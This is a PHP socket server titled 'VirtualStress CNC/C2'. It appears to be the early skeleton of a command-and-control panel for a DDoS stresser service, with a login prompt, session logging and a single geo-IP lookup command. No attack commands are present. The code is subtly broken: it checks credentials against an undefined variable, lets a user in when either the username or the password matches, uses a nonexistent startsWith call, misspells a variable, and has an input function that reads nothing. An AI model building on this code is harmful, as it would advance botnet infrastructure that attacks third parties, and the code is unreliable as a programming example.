#!/usr/bin/php
<?php


/*
@title: VirtualStress CNC/C2 
@creator: Scrapy
@since: 1/6/2021
*/

include("./Config/strings.php");
include("./Config/message_handler.php");
include("./Banners/banners.php");
include("./Auth/crud.php");
include("./Auth/auth.php");
ini_set('error_reporting', E_ALL ^ E_NOTICE);
ini_set('display_errors', 1);
error_reporting(E_ERROR | E_PARSE);
set_time_limit (0);

$crud = new CRUD();
$config = new STRING();
$banner = new BANNERS();
$auth = new AUTH();

$hostn = $config->CNC_Info["Hostname"];

if(count($argv) < 1) die("Error, Missing argument\r\nUsage ". $argv[0]. " <port>");
$address = file_get_contents("https://api.ipify.org");
$port = $argv[1];

$sock = socket_create(AF_INET, SOCK_STREAM, 0);
socket_bind($sock, $address, $port) or die('Could not bind to address');
socket_listen($sock);
socket_set_nonblock($sock);

// Loop continuously
while (true)
{
    unset($read);

    $j = 0;

    if (count($client))
    {
        foreach ($client AS $k => $v)
        {
            $read[$j] = $v;
            $j++;
        }
    }

    $client = $read;

    if ($newsock = @socket_accept($sock))
    {
        socket_write($newsock, $banner->main_banner($config->Colors["Red"], $config->Colors["Purple"], $config->Colors["Reset"]), strlen($banner->main_banner($config->Colors["Red"], $config->Colors["Purple"], $config->Colors["Reset"])));
        socket_write($newsock, "Welcome To VirtualStress C2!\r\n", strlen("Welcome To VirtualStress C2!\r\n"));
        socket_getpeername($newsock, $client_ip, $client_port);
        $usrname = getInput($newsock, "Username: ", 3);
        $passwd = getInput($newsock, "Password: ", 3);
        $user_info = explode(",", $gay);
        if($usrname == $user_info[0] || $passwd == $user_info[2]) {
            $crud->log_session($client_ip, $usrname);
            socket_write($newsock, "Successfully signed in, Welcome: ". $usrname. "\r\n", strlen("Successfully signed in, Welcome: ". $usrname. "\r\n"));
        } else {
            socket_write($newsock, "[x] Invalid Info\r\n", strlen("[x] Invalid Info\r\n"));
            // socket_close($newsock);
        }

        if (is_resource($newsock))
        {
            
            // socket_write($newsock, "$j>", 2).chr(0);
            socket_getpeername($newsock, $client_ip, $client_port);
            socket_getsockname($newsock, $socket_ip, $socket_port);
            echo "#[NEW CLIENT CONNECTED]#\r\nClient IP: $client_ip | Client Port: $client_port\r\n\r\n";

            $client[$j] = $newsock;

            $j++;
        }
    }

    if (count($client))
    {
        foreach ($client AS $k => $v)
        {
            if (@socket_recv($v, $string, 1024, MSG_DONTWAIT) === 0)
            {
                unset($client[$k]);
                socket_close($v);
            }
            else
            {
                if ($string)
                {
                    
                    socket_getpeername($v, $client_ip, $client_port);
                    $config->CurrentUser["CurrentIP"];
                    
                    /*
                    Command Handler
                    */
                    $CurrentMSG["Fullcmd"] = $string;
                    $split_cmd = explode(" ", $string);
                    $config->CurrentMSG["Cmd"] = $split_cmd[0];
                    $count = 0;
                    foreach($split_cmd as $cmmd) {
                        $config->CurrentMSG["arg"][$count] = $cmmd;
                    }

                    /*
                    END OF COMMAND HANDLER
                    */


                    $User_Info = $crud->Get_Current_Info($client_ip);
                    $get_usrn = explode(",", $User_Info);
                    $config->GetUserInfo($get_usrn[0]);
                    echo $config->CurrentUser["Username"]. " | ". $config->CurrentUser["CurrentIP"]. "\r\n\r\n";

                    /*
                    Command Checking
                    */
                    if($crud->isSignedIn($client_ip)) {
                        if($string.startsWith("geo")) {
                            $inputIP = $confg->CurrentMSG["arg"][1];
                            $response = file_get_contents("https://scrapy.tech/tools/?action=geoip&q=$inputIP");
                            socket_write($v, "$response\r\n$hostn", strlen("$response\r\n$hostn"));
                        } else {
                            socket_write($v, "[x] No command found\r\n$hostn", strlen("[x] No command found\r\n$hostn"));
                        }
                    } else {
                        socket_write($v, "Closing", strlen("Closing"));
                        // socket_close($v);
                    }
                    /*
                    END OF COMMAND CHECKING
                    */
                }
            }
        }
    }
    // sleep(1);
}


function getInput($socket, $str, $i) {
    $FetchedInput = "";
    $checking_characters = false;

    socket_write($socket, $str, strlen($str));
    sleep($i);
    $sokc = socket_recv($v, $string, 1024, MSG_DONTWAIT);

    echo $string;

    return $checking_characters;
}

function logg($str)
{
    echo $str. "\r\n\r\n";
}

// Close the master sockets
socket_close($sock);
?>